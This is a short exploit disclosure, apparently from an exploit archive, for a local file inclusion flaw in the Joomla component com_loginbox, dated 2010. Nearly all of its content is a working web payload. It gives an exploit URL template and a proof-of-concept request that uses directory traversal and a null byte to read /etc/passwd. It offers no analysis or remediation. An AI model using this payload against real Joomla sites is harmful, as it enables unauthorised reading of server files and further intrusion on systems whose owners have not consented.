id: 11633
date: 04/05/2010
title: Joomla Component com_loginbox LFI Vulnerability
author: Vrs-hCk
cves: 

===============================================
Joomla Component com_loginbox LFI Vulnerability
===============================================

================================================================================================
 
 Title    : Joomla Component com_loginbox LFI Vulnerability
 Date     : Monday, 05 April 2010 (Indonesia)
 Author   : Vrs-hCk
 Contact  : ander[at]antisecurity.org
 Blog     : http://c0li.blogspot.com/
 
 ================================================================================================
 
 [+] Exploit
 
     http://[site]/[path]/index.php?option=com_loginbox&view=[LFI]
 
 [+] PoC
 
     http://localhost/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00
 
 ================================================================================================




#  0day.today [2023-03-22]  #